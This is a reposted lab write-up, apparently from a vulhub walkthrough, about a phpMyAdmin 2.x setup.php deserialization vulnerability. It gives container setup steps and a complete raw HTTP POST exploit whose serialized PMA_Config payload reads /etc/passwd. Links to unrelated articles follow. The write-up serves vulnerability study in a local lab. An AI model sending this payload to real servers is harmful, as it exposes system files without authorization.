首页 > 其他分享 >WooYun-2016-199433

WooYun-2016-199433

时间:2024-05-23 10:44:05浏览次数:12  
标签:phpmyadmin 199433 WooYun Accept Content 2016

Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433)

Affected version:2.x

Setup

cd vulhub/phpmyadmin/WooYun-2016-199433
docker-compose up -d

Visit http://10.10.10.8:8080 and you will see the phpmyadmin home page.Because there is no connection to the database,we will get an error.But this vulnerability is not related to the database,so just ignore.

Exploit

POST /scripts/setup.php HTTP/1.1
Host: 10.10.10.8:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

img

标签:phpmyadmin,199433,WooYun,Accept,Content,2016
From: https://www.cnblogs.com/kalixcn/p/18207857

相关文章

  • ACCESS2016 所有人的成绩增加2分
    打开Access2016,然后打开包含成绩数据的数据库。找到包含成绩数据的表。通常,这个表会有一个字段用来存储学生的分数。打开“查询”视图。你可以通过点击“创建”选项卡,然后选择“查询设计”来创建一个新的查询。在查询设计视图中,将成绩表添加到查询中。可以通过点击“......
  • P3270 [JLOI2016] 成绩比较
    记\(a_i=N-R_i,n=N-1\)。先不考虑有多少人被碾压,计算出符合排名限制的方案数。枚举每门课和B神在每门课中的得分,选出\(a_i\)个人得分小于等于他,即:\[\prod\limits_{i=1}^m\dbinom{n}{a_i}\sum\limits_{j=1}^{U_i}j^{a_i}(U_i-j)^{n-a_i}\]设\(s(x)=\sum\limits_{j=1}^{......
  • ECMA 2016(ES7)新特性
    本章内容:Array.prototype.includes():判断一个数组是否包含一个指定的值,如果包含则返回true,否则返回false。幂运算符**:a**b指数运算符,它与Math.pow(a,b)相同。Array.prototype.includes()includes()函数用来判断一个数组是否包含一个指定的值,如果包含则返回true,否......
  • CVE-2016-3088
    ActiveMQ任意文件写入漏洞(CVE-2016-3088)环境搭建cdvulhub/activemq/CVE-2016-3088docker-composebuilddocker-composeup-d环境监听61616端口和8161端口,其中8161为web控制台端口,本漏洞就出现在web控制台中。访问http://10.10.10.8:8161/看到web页面,说明环境已成功运行。......
  • P5999 [CEOI2016] kangaroo
    题目大意求出有多少种排列\(p\)满足对于任意\(i\in(1,n)\)有\(p_i\)两侧的值同时大于或小于\(p_i\)。规定\(p_1=s,p_n=t\)。\(2\leqn\leq2\times10^3,1\leqs,t\leqn\)思路首先能看出是动态规划。但是如果纯区间动规的话不太好转移,因为无法使得两个区间拼接的部分......
  • [SDOI2016] 数字配对 题解
    发现题目中描述的配对条件可以理解为:\(pc_i-pc_j=1\)且\(a_i\bmoda_j=0\),其中\(pc_i\)表示\(a_i\)的质因数个数。自然想到以\(pc\)奇偶性建立二分图,可以配对的点间连一条边。先不考虑费用,三种边为:\((s,i,b_i)\),其中\(pc_i\bmod2=1\)。\((i,t,b_i)\),其中\(pc_i\bm......
  • [SWPUCTF 2016]Web7 利用ssrf攻击redis
    今天做了一道攻击redis的相关题目,以前没接触过。初始界面有输入框,随便输入看看。是urllib2相关库报错,去搜了搜发现是Python2的Urllib2头部注入(CVE-2016-5699)。那就看看这个cve。说是Python2.x3.x的urllib/urllib2从数据解析到发包的整个流程中,均未对URL提供安全性过滤或检查......
  • sql server 2016 查询表结构
    select [表名] =CASEWHENc.column_id=1thenSCHEMA_NAME(t.schema_id)+'.'+t.nameELSE''END, [表创建时间]=CASEWHENc.column_id=1thenCONVERT(varchar,t.create_date,111)ELSE''END, [表修改时间]=CASEWHENc.column_id......
  • 阿里云Windows server 2016服务器Antimalware Service Executable进程占比高,cpu接近10
    问题描述:阿里云Windowsserver2016服务器AntimalwareServiceExecutable进程占比高,cpu接近100%,需要强制关闭该进程,排查问题,进入系统服务关闭,提示拒绝访问(该服务关闭后有风险,需评估后操作)  操作步骤:1.进入服务器,进入Windowspowershell界面; 2. 输入 regadd"HKEY_L......
  • C120 树剖+李超树 P4069 [SDOI2016] 游戏
    视频链接:C120树剖+李超树P4069[SDOI2016]游戏_哔哩哔哩_bilibili    D12LuoguP3384【模板】轻重链剖分/树链剖分-董晓-博客园(cnblogs.com) LuoguP4069[SDOI2016]游戏//树剖+李超树O(nlognlognlogn)#include<iostream>#include<cstring>#in......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99